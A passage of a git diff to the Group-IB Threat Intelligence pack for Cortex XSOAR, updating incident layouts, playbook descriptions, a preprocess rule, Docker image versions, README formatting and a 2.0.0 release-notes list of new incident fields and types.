"height": 22, + "id": "0e6f9f30-71aa-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibseverity", + "height": 22, + "id": "1153ac50-71aa-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Evaluation", + "static": false, + "w": 1, + "x": 1, + "y": 2 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-eb54f540-71a9-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibid", + "height": 22, + "id": "f7145010-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibdatefirstseen", + "height": 22, + "id": "f9d6f280-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibdatelastseen", + "height": 22, + "id": "fc4ed050-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibvpnsources", + "height": 22, + "id": "ff63ff90-71a9-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibvpnnames", + "height": 22, + "id": "02491e20-71aa-11ef-8c49-f9d8b5e80cf6", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibportallink", + "height": 22, + "id": "05211d50-71aa-11ef-8c49-f9d8b5e80cf6", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Information from Group-IB", + "static": false, + "w": 1, + "x": 0, + "y": 2 + } + ], + "type": "custom" + }, + { + "id": "warRoom", + "name": "War Room", + "type": "warRoom" + }, + { + "id": "workPlan", + "name": "Work Plan", + "type": "workPlan" + }, + { + "id": "evidenceBoard", + "name": "Evidence Board", + "type": "evidenceBoard" + }, + { + "id": "relatedIncidents", + "name": "Related Incidents", + "type": "relatedIncidents" + }, + { + "id": "canvas", + "name": "Canvas", + "type": "canvas" + } + ] + }, + "group": "incident", + "id": "GIB Suspicious IP VPN Layout", + "name": "GIB Suspicious IP VPN Layout", + "system": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Targeted_Malware_Layout.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Targeted_Malware_Layout.json index 29b71f43f714..75c246770e28 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Targeted_Malware_Layout.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Targeted_Malware_Layout.json @@ -383,7 +383,7 @@ "minH": 1, "minW": 1, "moved": false, - "name": "Information from GIB TIA", + "name": "Information from GIB", "static": false, "w": 2, "x": 0, @@ -425,5 +425,7 @@ "system": false, "version": -1, "fromVersion": "6.0.0", - "marketplaces": ["xsoar"] + "marketplaces": [ + "xsoar" + ] } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Victim_IP_Layout.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Victim_IP_Layout.json index b13d9c0bc1f8..9928df3e6c19 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Victim_IP_Layout.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Victim_IP_Layout.json @@ -233,7 +233,7 @@ "minH": 1, "minW": 1, "moved": false, - "name": "Information from GIB TIA", + "name": "Information from GIB", "static": false, "w": 2, "x": 0, diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Playbooks/Incident_Postprocessing_-_Group-IB_Threat_Intelligence_and_Attribution.yml b/Packs/GroupIB_ThreatIntelligenceAttribution/Playbooks/Incident_Postprocessing_-_Group-IB_Threat_Intelligence_and_Attribution.yml index d6555eb8644a..fac3675faf0e 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/Playbooks/Incident_Postprocessing_-_Group-IB_Threat_Intelligence_and_Attribution.yml +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Playbooks/Incident_Postprocessing_-_Group-IB_Threat_Intelligence_and_Attribution.yml @@ -1,5 +1,4 @@ -description: Obtains additional information on the threat actor involved in the incident - and associates related indicators to the incident. +description: Obtains additional information on the threat actor involved in the incident and associates related indicators to the incident. id: Incident Postprocessing - Group-IB Threat Intelligence & Attribution inputs: [] name: Incident Postprocessing - Group-IB Threat Intelligence & Attribution @@ -143,8 +142,7 @@ tasks: skipunavailable: true task: brand: "" - description: Command performs Group IB event lookup in hi/threat_actor (or in - apt/threat_actor if the APT flag is true) collection with provided ID. + description: Command performs Group IB event lookup in hi/threat_actor (or in apt/threat_actor if the APT flag is true) collection with provided ID. id: ff71936b-d74f-4a5a-86cd-ea5ff4b610f6 iscommand: true name: gibtia-get-threat-actor-info @@ -183,8 +181,7 @@ tasks: skipunavailable: true task: brand: "" - description: Command performs Group IB event lookup in hi/threat (or in apt/threat - if the APT flag is true) collection with provided ID. + description: Command performs Group IB event lookup in hi/threat (or in apt/threat if the APT flag is true) collection with provided ID. id: 5701ade1-4390-4c6f-859e-e9a8a70758ae iscommand: true name: gibtia-get-threat-info diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Playbooks/Incident_Postprocessing_-_Group-IB_Threat_Intelligence_and_Attribution_README.md b/Packs/GroupIB_ThreatIntelligenceAttribution/Playbooks/Incident_Postprocessing_-_Group-IB_Threat_Intelligence_and_Attribution_README.md index dca661577ac4..b7c492ee31cf 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/Playbooks/Incident_Postprocessing_-_Group-IB_Threat_Intelligence_and_Attribution_README.md +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Playbooks/Incident_Postprocessing_-_Group-IB_Threat_Intelligence_and_Attribution_README.md @@ -1,30 +1,38 @@ Obtains additional information on the threat actor involved in the incident and associates related indicators to the incident. ## Dependencies + This playbook uses the following sub-playbooks, integrations, and scripts. ### Sub-playbooks + This playbook does not use any sub-playbooks. ### Integrations + * Group-IB Threat Intelligence ### Scripts + This playbook does not use any scripts. ### Commands + * gibtia-get-threat-actor-info * gibtia-get-threat-info * associateIndicatorsToIncident ## Playbook Inputs + --- There are no inputs for this playbook. ## Playbook Outputs + --- There are no outputs for this playbook. ## Playbook Image + --- ![Incident Postprocessing - Group-IB Threat Intelligence](../doc_files/Incident_Postprocessing_-_Group-IB_Threat_Intelligence_and_Attribution.png) diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/PreProcessRules/preprocessrule-4d9ca067-e506-4bcb-8ee5-fe5fb30e72d8-gib_rule.json b/Packs/GroupIB_ThreatIntelligenceAttribution/PreProcessRules/preprocessrule-4d9ca067-e506-4bcb-8ee5-fe5fb30e72d8-gib_rule.json new file mode 100644 index 000000000000..ad4722d1d1aa --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/PreProcessRules/preprocessrule-4d9ca067-e506-4bcb-8ee5-fe5fb30e72d8-gib_rule.json @@ -0,0 +1,89 @@ +{ + "action": "script", + "enabled": true, + "id": "gib_rule", + "index": 0, + "itemVersion": "", + "linkTo": "oldest", + "locked": false, + "name": "gib_rule", + "newEventFilters": [ + [ + { + "left": { + "isContext": true, + "value": { + "simple": "gibid" + } + }, + "operator": "isNotEmpty", + "right": { + "value": {} + }, + "type": "shortText" + } + ], + [ + { + "left": { + "isContext": true, + "value": { + "simple": "type" + } + }, + "operator": "isNotEqualString", + "right": { + "value": { + "simple": "GIB Data Breach" + } + }, + "type": "singleSelect" + } + ] + ], + "packID": "", + "period": { + "by": "days", + "fromValue": 30 + }, + "readyNewEventFilters": [ + [ + { + "left": { + "isContext": true, + "value": { + "simple": "gibid" + } + }, + "operator": "isNotEmpty", + "right": { + "value": {} + }, + "type": "shortText" + } + ], + [ + { + "left": { + "isContext": true, + "value": { + "simple": "type" + } + }, + "operator": "isNotEqualString", + "right": { + "value": { + "simple": "GIB Data Breach" + } + }, + "type": "singleSelect" + } + ] + ], + "scriptName": "", + "searchClosed": false, + "system": false, + "toServerVersion": "", + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/README.md b/Packs/GroupIB_ThreatIntelligenceAttribution/README.md index 4db1adb74e06..8f54345955e2 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/README.md +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/README.md @@ -3,6 +3,7 @@ Nowadays businesses in any sphere may have problems with their cybersecurity: fr Group-IB Threat Intelligence Pack can help you with managing your incident and indicators from Group-IB within the SOAR system. ### What does this pack do? + * Receive incidents and attribute them to adversaries. * Enrich security system with IOCs. * Provide possibilities for manual investigation through Group-IB data via Cortex XSOAR interface. diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/ReleaseNotes/2_0_0.md b/Packs/GroupIB_ThreatIntelligenceAttribution/ReleaseNotes/2_0_0.md new file mode 100644 index 000000000000..917ce431a716 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/ReleaseNotes/2_0_0.md @@ -0,0 +1,620 @@ + +#### Classifiers + +##### Group-IB Threat Intelligence (classifier) + +- Added and modified classifications for new collections + +#### Incident Fields + +- Added new incident fields for new and old collections and also changed old incident fields related to old collections + +##### GIB Address + +##### New: GIB Cybercriminal Forums Table + +##### GIB Downloaded From + +##### New: GIB Nation-State Cybercriminals Expertises + +##### New: GIB Merged Cvss + +##### New: GIB Nation-State Cybercriminals Threat Actor Aliases + +##### New: GIB Malware Platforms + +##### New: GIB Leak Published + +##### New: GIB Report Number + +##### New: GIB Provider Domain + +##### New: GIB CPE Table + +##### New: GIB Socks Proxy Source + +##### New: GIB Target Provider + +##### New: GIB Cybercriminal Sectors + +##### New: GIB Nation-State Cybercriminals Regions + +##### New: GIB Nation-State Cybercriminals Threat Title + +##### New: GIB Date Add + +##### GIB Leaked File Name + +##### New: GIB Date First Compromised + +##### New: GIB Compromised Events Information Table + +##### New: GIB Cybercriminal Threat Title + +##### New: GIB Nation-State Cybercriminals Threat Actor Reports Table + +##### New: GIB DDOS Date End + +##### New: GIB Cybercriminal Threat Actor Report Authors + +##### New: GIB Organization IBAN + +##### New: GIB Mirror Link + +##### GIB ID + +##### New: GIB Deface Date + +##### New: GIB DDOS Request Body + +##### GIB Card Number + +##### New: GIB Email Domains + +##### New: GIB DDOS Target City + +##### GIB Phishing Date Blocked + +##### GIB Date of Detection + +##### New: GIB Organization BSB + +##### New: GIB Malware Description + +##### New: GIB Phishing URLs + +##### New: GIB Nation-State Cybercriminals Threat Regions + +##### New: GIB Nation-State Cybercriminals Threat Actor Country + +##### New: GIB Target IP + +##### New: GIB Threat Level + +##### New: GIB Country Name + +##### New: GIB Organization CLABE + +##### New: GIB Date Last Compromised + +##### New: GIB Extended CVSS Base + +##### New: GIB Vulnerability Type + +##### New: GIB Proxy Port + +##### New: GIB Date Last Seen + +##### New: GIB Phishing Kit Path + +##### GIB Severity + +##### New: GIB DDOS Target Domain + +##### New: GIB Organization SWIFT + +##### New: GIB Malware Aliases + +##### GIB Drop Email + +##### New: GIB Target ASN + +##### New: GIB Extended CVSS Temporal + +##### New: GIB Downloaded From Table + +##### New: GIB Nation-State Cybercriminals Threat Actor Roles + +##### New: GIB Date Updated At + +##### New: GIB Malware Regions + +##### GIB Drop Email Domain + +##### New: GIB VPN Sources + +##### GIB Malware Name + +##### New: GIB Link List Table + +##### New: CPE Table + +##### GIB Favicon + +##### GIB Person + +##### New: GIB Affected Software Table + +##### New: GIB CVSS Vector + +##### New: GIB Passwords + +##### GIB Date Compromised + +##### GIB Leak Name + +##### New: GIB DDOS Request Headers Body + +##### New: GIB Emails + +##### GIB Compromised Login + +##### GIB Related Indicators Data + +##### New: GIB Organization Name + +##### New: GIB Malware Table + +##### New: GIB DDOS Date Begin + +##### GIB CVV + +##### New: GIB Nation-State Cybercriminals Threat Langs + +##### GIB Admiralty Code + +##### New: GIB DDOS Target URL + +##### New: GIB DDOS Target Provider + +##### New: GIB Proxy Source + +##### New: GIB Extended CVSS Overall + +##### GIB Phishing Type + +##### New: GIB Malware Short Description + +##### New: GIB Nation-State Cybercriminals Threat Description + +##### GIB Email + +##### New: GIB Parsed Login Domain + +##### GIB Inject Dump + +##### New: GIB Cybercriminal Threat Description + +##### New: GIB CNC Port + +##### New: GIB Service IP + +##### GIB Leaked Data + +##### New: GIB Phishing Kit Email + +##### New: GIB Is Tailored + +##### New: GIB Target Domain Provider + +##### New: GIB Extended Description + +##### New: GIB Upload Time + +##### New: GIB Malware File hash + +##### New: GIB Nation-State Cybercriminals Threat Actor Labels + +##### New: GIB DDOS Target Country Code + +##### New: GIB Matches Table + +##### New: GIB Phishing IP Table + +##### New: GIB DDOS Request Headers Hash + +##### GIB Password + +##### New: GIB DDOS Protocol + +##### New: GIB DDOS Date Registration + +##### New: GIB Cybercriminal Regions + +##### New: GIB Proxy Type + +##### GIB Phishing Kit Emails + +##### GIB Source + +##### GIB Phishing Status + +##### New: GIB DDOS Target Port + +##### New: GIB Malware Langs + +##### New: GIB Service URL + +##### New: GIB Nation-State Cybercriminals Threat Expertises + +##### New: GIB Deface Source + +##### New: GIB Nation-State Cybercriminals Malware + +##### GIB Name Servers + +##### New: GIB Country Code + +##### New: GIB Bulletin Family + +##### New: GIB Deface Site URL + +##### New: GIB Has Exploit + +##### GIB Reliability + +##### New: GIB Nation-State Cybercriminals Threat Actor Description + +##### New: GIB Target Region + +##### New: GIB Phishing Domain Puny + +##### New: GIB Nation-State Cybercriminals Threat Report Number + +##### New: GIB Phishing Objectives + +##### New: GIB Phishing Sources + +##### New: GIB Date Modified + +##### New: GIB DDOS Target Category + +##### New: GIB Cybercriminal Threat Actor Aliases + +##### New: GIB Service Domain + +##### GIB Title + +##### New: GIB Phishing Registrar + +##### GIB Card Issuer + +##### New: GIB Cybercriminal Expertises + +##### New: GIB Nation-State Cybercriminals Sectors + +##### New: GIB GIT Source + +##### GIB Threat Actor is APT + +##### New: GIB DDOS Target IP + +##### New: GIB Nation-State Cybercriminals Threat Actor CVE + +##### New: GIB DDOS Request Body Hash + +##### New: GIB CNC URL + +##### New: GIB Compromised Events Table + +##### New: GIB Extended CVSS Exploitability + +##### New: GIB Threat Actors Table + +##### New: GIB Nation-State Cybercriminals Threat Sectors + +##### New: GIB Organization BIC + +##### GIB Inject MD5 + +##### New: GIB Target City + +##### New: GIB DDOS Type + +##### GIB Date Created + +##### New: GIB Phishing Date Updated + +##### New: GIB Date First Seen + +##### New: GIB Date Published + +##### New: GIB Malware Categories + +##### New: GIB DDOS Target Region + +##### New: GIB DDOS Source + +##### New: GIB VPN Names + +##### New: GIB Cybercriminal Malware + +##### New: GIB Extended CVSS Impact + +##### GIB Payment System + +##### New: GIB Phishing Domain Expiration Date + +##### GIB Victim IP + +##### GIB Repository + +##### New: GIB DDOS Duration + +##### New: GIB DDOS Target Country Name + +##### New: GIB Phishing Kit Table + +##### New: GIB Reporter + +##### GIB Phishing Kit Hash + +##### New: GIB Date Created At + +##### New: GIB Phishing Kit Source + +##### New: GIB Nation-State Cybercriminal Forums Table + +##### GIB Threat Actor ID + +##### GIB Credibility + +##### New: GIB Nation-State Cybercriminals Threat Countries + +##### New: GIB Cybercriminal Threat Actor Description + +##### New: GIB Parsed Login IP + +##### New: GIB Phishing Date Detected + +##### GIB Card Type + +##### GIB Threat Actor Name + +##### GIB Target Brand + +##### New: GIB Deface Contacts + +##### New: GIB Proxy Sources + +##### New: GIB Phishing Brand + +##### New: GIB Threat Actor Country + +##### New: GIB Scanner Categories + +##### New: GIB Nation-State Cybercriminals Threat Actor Goals + +##### New: GIB Cybercriminal Threat Actor Reports Table + +##### New: GIB Malware CNC Domain + +##### GIB HTML + +##### New: GIB CNC + +##### New: GIB DDOS Target ASN + +##### GIB Screenshot + +##### GIB Phishing Domain + +##### New: GIB Href + +##### New: GIB OSI Git Repository Files Table + +##### New: GIB Malware Source Countries + +##### GIB Card Valid Thru + +##### New: GIB Scanner Sources + +##### New: GIB Phishing Date Added + +##### GIB Target Category + +##### New: GIB CVSS Score + +##### GIB Date Expired + +##### New: GIB Compromised Account + +##### New: GIB DDOS Request Data Link + +##### New: GIB CNC Domain + +##### New: GIB Date Incident + +##### GIB Portal Link + +##### GIB Target Domain + +##### New: GIB Update Time + +##### GIB Data Hash + + +#### Incident Types + +- Added new incident types for new and old collections and also changed old incident types related to old collections + +##### New: GIB Nation-State Cybercriminals Threat Actor + +##### New: GIB Suspicious IP Scanner + +##### New: GIB Suspicious IP Socks Proxy + +##### New: GIB Compromised Card Group + +##### New: GIB Suspicious IP TOR Node + +##### New: GIB Attacks DDOS + +##### New: GIB Attacks Phishing Kit + +##### New: GIB Compromised Account Group + +##### GIB Compromised Card + +##### New: GIB OSI Vulnerability + +##### GIB OSI Public Leak + +##### New: GIB Nation-State Cybercriminals Threat + +##### GIB Brand Protection Phishing + +##### GIB Targeted Malware + +##### New: GIB Malware CNC + +##### New: GIB Cybercriminal Threat + +##### GIB Compromised Account + +##### New: GIB Malware + +##### GIB OSI Git Leak + +##### New: GIB Suspicious IP Open Proxy + +##### New: GIB Cybercriminal Threat Actor + +##### New: GIB Suspicious IP VPN + +##### New: GIB APT Threat + +##### New: GIB Compromised Mule + +##### GIB Data Breach + +##### GIB Brand Protection Phishing Kit + +##### New: GIB Attacks Deface + +##### New: GIB Attacks Phishing Group + + +#### Indicator Fields + +- Added new indicator fields for new and old collections and also changed old indicator fields related to old collections + +##### GIB Malware Name + +##### GIB Severity + +##### GIB Reliability + +##### GIB Threat Actor is APT + +##### GIB Admiralty Code + +##### GIB Credibility + +##### New: GIB Hash + +##### GIB ID + +##### GIB Threat Actor Name + +##### GIB Threat Actor ID + +##### GIB Collection + + +#### Integrations + +##### Group-IB Threat Intelligence + +- Updated the Docker image to: *demisto/vendors-sdk:1.0.0.106889*. +- Completely updated the code, the main work with API is rewritten to use the library + +##### Group-IB Threat Intelligence Feed + +- Updated the Docker image to: *demisto/vendors-sdk:1.0.0.106889*. +- Completely updated the code, the main work with API is rewritten to use the library + +#### Layouts + +- New layouts for new collections have been added, as well as old layouts have been modified + +##### New: GIB Attacks Phishing Group Layout + +##### GIB Compromised Card Layout + +##### New: GIB Compromised Account Group Layout + +##### GIB Targeted Malware Layout + +##### New: GIB Suspicious IP Scanner Layout + +##### GIB Compromised Account Layout + +##### New: GIB Attacks Deface Layout + +##### New: GIB Cybercriminal Threat Actor Layout + +##### New: GIB Suspicious IP Open Proxy Layout + +##### New: GIB Malware CNC Layout + +##### GIB OSI Public Leak Layout + +##### New: GIB Compromised Card Group Layout + +##### New: GIB Nation-State Cybercriminals Threat Layout + +##### New: GIB OSI Vulnerability Layout + +##### New: GIB Attacks Phishing Kit Layout + +##### GIB Victim IP Layout + +##### GIB Data Breach Layout + +##### New: GIB Cybercriminal Threat Layout + +##### GIB Brand Protection Phishing Kit Layout + +##### New: GIB APT Threat Layout + +##### New: GIB Nation-State Cybercriminals Threat Actor Layout + +##### New: GIB Attacks DDOS Layout + +##### GIB Brand Protection Phishing Layout + +##### New: GIB Suspicious IP Socks Proxy Layout + +##### GIB Compromised IMEI Layout + +##### GIB Compromised Mule Layout + +##### GIB OSI Git Leak Layout + +##### New: GIB Malware Layout + +##### New: GIB Suspicious IP VPN Layout + +##### New: GIB Suspicious IP TOR Node Layout + + +#### Mappers + +##### Group-IB Threat Intelligence (mapper) + +- Added under new collections and edited under old collections + +#### PreProcess Rules + +##### New: gib_test diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Scripts/GIBIncidentUpdate/GIBIncidentUpdate.yml b/Packs/GroupIB_ThreatIntelligenceAttribution/Scripts/GIBIncidentUpdate/GIBIncidentUpdate.yml index 893a13b788f9..01f66d1cebc7 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/Scripts/GIBIncidentUpdate/GIBIncidentUpdate.yml +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Scripts/GIBIncidentUpdate/GIBIncidentUpdate.yml @@ -9,7 +9,7 @@ comment: |- commonfields: id: GIBIncidentUpdate version: -1 -dockerimage: demisto/python3:3.11.10.116949 +dockerimage: demisto/python3:3.12.8.1983910 enabled: true name: GIBIncidentUpdate script: '' diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Scripts/GIBIncidentUpdate/README.md b/Packs/GroupIB_ThreatIntelligenceAttribution/Scripts/GIBIncidentUpdate/README.md index d831c388ccef..77241cc2324a 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/Scripts/GIBIncidentUpdate/README.md +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Scripts/GIBIncidentUpdate/README.md @@ -1,12 +1,14 @@ This script prevents duplication of existing incidents. ## Permissions + --- This automation runs using the default Limited User role, unless you explicitly change the permissions. -For more information, see the section about permissions here: For Cortex XSOAR 6, see the https://docs-cortex.paloaltonetworks.com/r/Cortex-XSOAR/6.x/Cortex-XSOAR-Playbook-Design-Guide/Automations for Cortex XSOAR 8 Cloud, see the https://docs-cortex.paloaltonetworks.com/r/Cortex-XSOAR/8/Cortex-XSOAR-Cloud-Documentation/Create-a-script for Cortex XSOAR 8 On-prem, see the https://docs-cortex.paloaltonetworks.com/r/Cortex-XSOAR/8.7/Cortex-XSOAR-On-prem-Documentation/Create-a-script. +For more information, see the section about permissions here: For Cortex XSOAR 6, see the for Cortex XSOAR 8 Cloud, see the for Cortex XSOAR 8 On-prem, see the . ## Script Data + --- | **Name** | **Description** | @@ -16,9 +18,11 @@ For more information, see the section about permissions here: For Cortex XSOAR 6 | Cortex XSOAR Version | 6.0.0 | ## Inputs + --- There are no inputs for this script. ## Outputs + --- There are no outputs for this script. diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Scripts/GIBIncidentUpdateIncludingClosed/GIBIncidentUpdateIncludingClosed.yml b/Packs/GroupIB_ThreatIntelligenceAttribution/Scripts/GIBIncidentUpdateIncludingClosed/GIBIncidentUpdateIncludingClosed.yml index 1bb25c257407..e7eefbce785d 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/Scripts/GIBIncidentUpdateIncludingClosed/GIBIncidentUpdateIncludingClosed.yml +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Scripts/GIBIncidentUpdateIncludingClosed/GIBIncidentUpdateIncludingClosed.yml @@ -9,7 +9,7 @@ comment: |- commonfields: id: GIBIncidentUpdateIncludingClosed version: -1 -dockerimage: demisto/python3:3.11.10.116949 +dockerimage: demisto/python3:3.12.8.1983910 enabled: true name: GIBIncidentUpdateIncludingClosed script: '' diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Scripts/GIBIncidentUpdateIncludingClosed/README.md b/Packs/GroupIB_ThreatIntelligenceAttribution/Scripts/GIBIncidentUpdateIncludingClosed/README.md index d831c388ccef..77241cc2324a 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/Scripts/GIBIncidentUpdateIncludingClosed/README.md +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Scripts/GIBIncidentUpdateIncludingClosed/README.md @@ -1,12 +1,14 @@ This script prevents duplication of existing incidents. ## Permissions + --- This automation runs using the default Limited User role, unless you explicitly change the permissions. -For more information, see the section about permissions here: For Cortex XSOAR 6, see the https://docs-cortex.paloaltonetworks.com/r/Cortex-XSOAR/6.x/Cortex-XSOAR-Playbook-Design-Guide/Automations for Cortex XSOAR 8 Cloud, see the https://docs-cortex.paloaltonetworks.com/r/Cortex-XSOAR/8/Cortex-XSOAR-Cloud-Documentation/Create-a-script for Cortex XSOAR 8 On-prem, see the https://docs-cortex.paloaltonetworks.com/r/Cortex-XSOAR/8.7/Cortex-XSOAR-On-prem-Documentation/Create-a-script. +For more information, see the section about permissions here: For Cortex XSOAR 6, see the for Cortex XSOAR 8 Cloud, see the for Cortex XSOAR 8 On-prem, see the . ## Script Data + --- | **Name** | **Description** | @@ -16,9 +18,11 @@ For more information, see the section about permissions here: For Cortex XSOAR 6 | Cortex XSOAR Version | 6.0.0 | ## Inputs + --- There are no inputs for this script. ## Outputs + --- There are no outputs for this script. diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/TestPlaybooks/Group-IB_Threat_Intelligence_&_Attribution-Test.yml b/Packs/GroupIB_ThreatIntelligenceAttribution/TestPlaybooks/Group-IB_Threat_Intelligence_&_Attribution-Test.yml index 502b1f5a2398..d084123871ad 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/TestPlaybooks/Group-IB_Threat_Intelligence_&_Attribution-Test.yml +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/TestPlaybooks/Group-IB_Threat_Intelligence_&_Attribution-Test.yml @@ -20,6 +20,7 @@ tasks: iscommand: false name: "" version: -1 + description: '' taskid: 631167a0-5f24-43e6-8a44-9860568c5711 timertriggers: [] type: start @@ -110,8 +111,7 @@ tasks: skipunavailable: false task: brand: Group-IB Threat Intelligence & Attribution - description: Command performs Group IB event lookup in compromised/imei collection - with provided ID. + description: Command performs Group IB event lookup in compromised/imei collection with provided ID. id: d48cf365-e7b0-4ad7-82d8-782747c49da6 iscommand: true name: gibtia-get-compromised-imei-info @@ -143,8 +143,7 @@ tasks: skipunavailable: false task: brand: Group-IB Threat Intelligence & Attribution - description: Command performs Group IB event lookup in compromised/mule collection - with provided ID. + description: Command performs Group IB event lookup in compromised/mule collection with provided ID. id: c0f7f60e-df38-4279-8962-a776b7acc0f9 iscommand: true name: gibtia-get-compromised-mule-info @@ -176,8 +175,7 @@ tasks: skipunavailable: false task: brand: Group-IB Threat Intelligence & Attribution - description: Command performs Group IB event lookup in attacks/ddos collection - with provided ID. + description: Command performs Group IB event lookup in attacks/ddos collection with provided ID. id: 8a87b580-33e0-41ff-88ff-901d8cf7291c iscommand: true name: gibtia-get-attacks-ddos-info @@ -209,8 +207,7 @@ tasks: skipunavailable: false task: brand: Group-IB Threat Intelligence & Attribution - description: Command performs Group IB event lookup in attacks/deface collection - with provided ID. + description: Command performs Group IB event lookup in attacks/deface collection with provided ID. id: 3ec6978b-6346-4b2c-8612-79070afce502 iscommand: true name: gibtia-get-attacks-deface-info @@ -242,8 +239,7 @@ tasks: skipunavailable: false task: brand: Group-IB Threat Intelligence & Attribution - description: Command performs Group IB event lookup in bp/phishing and attacks/phishing - collections with provided ID. + description: Command performs Group IB event lookup in bp/phishing and attacks/phishing collections with provided ID. id: 1599062a-59a1-4fc8-8813-e6eb7e22a3fd iscommand: true name: gibtia-get-phishing-info @@ -275,8 +271,7 @@ tasks: skipunavailable: false task: brand: Group-IB Threat Intelligence & Attribution - description: Command performs Group IB event lookup in bp/phishing_kit and attacks/phishing_kit - collections with provided ID. + description: Command performs Group IB event lookup in bp/phishing_kit and attacks/phishing_kit collections with provided ID. id: 724bd9b1-9dae-4775-8ee4-1df068d6fbb6 iscommand: true name: gibtia-get-phishing-kit-info @@ -310,8 +305,7 @@ tasks: skipunavailable: false task: brand: Group-IB Threat Intelligence & Attribution - description: Command performs Group IB event lookup in hi/threat (or in apt/threat - if the APT flag is true) collection with provided ID. + description: Command performs Group IB event lookup in hi/threat (or in apt/threat if the APT flag is true) collection with provided ID. id: eae8cd79-0648-40d4-8148-036d84f9ec45 iscommand: true name: gibtia-get-threat-info @@ -344,8 +338,7 @@ tasks: skipunavailable: false task: brand: Group-IB Threat Intelligence & Attribution - description: Command performs Group IB event lookup in hi/threat_actor (or in - apt/threat_actor if the APT flag is true) collection with provided ID. + description: Command performs Group IB event lookup in hi/threat_actor (or in apt/threat_actor if the APT flag is true) collection with provided ID. id: 0e714742-8a8e-4e2f-8095-dae0748e3890 iscommand: true name: gibtia-get-threat-actor-info @@ -377,8 +370,7 @@ tasks: skipunavailable: false task: brand: Group-IB Threat Intelligence & Attribution - description: Command performs Group IB event lookup in suspicious_ip/open_proxy - collection with provided ID. + description: Command performs Group IB event lookup in suspicious_ip/open_proxy collection with provided ID. id: 98e99b45-424a-4ae0-837c-db1f6dd6d4f0 iscommand: true name: gibtia-get-suspicious-ip-open-proxy-info @@ -410,8 +402,7 @@ tasks: skipunavailable: false task: brand: Group-IB Threat Intelligence & Attribution - description: Command performs Group IB event lookup in suspicious_ip/socks_proxy - collection with provided ID. + description: Command performs Group IB event lookup in suspicious_ip/socks_proxy collection with provided ID. id: af6be76b-bb06-44b7-894e-74d0113fa744 iscommand: true name: gibtia-get-suspicious-ip-socks-proxy-info @@ -443,8 +434,7 @@ tasks: skipunavailable: false task: brand: Group-IB Threat Intelligence & Attribution - description: Command performs Group IB event lookup in suspicious_ip/tor_node - collection with provided ID. + description: Command performs Group IB event lookup in suspicious_ip/tor_node collection with provided ID. id: 593ee8bc-3791-4a57-8170-9c69fe966e28 iscommand: true name: gibtia-get-suspicious-ip-tor-node-info @@ -476,8 +466,7 @@ tasks: skipunavailable: false task: brand: Group-IB Threat Intelligence & Attribution - description: Command performs Group IB event lookup in osi/vulnerability collection - with provided ID. + description: Command performs Group IB event lookup in osi/vulnerability collection with provided ID. id: 42c3d3b3-c343-478f-8b62-e298df041864 iscommand: true name: gibtia-get-osi-vulnerability-info @@ -509,8 +498,7 @@ tasks: skipunavailable: false 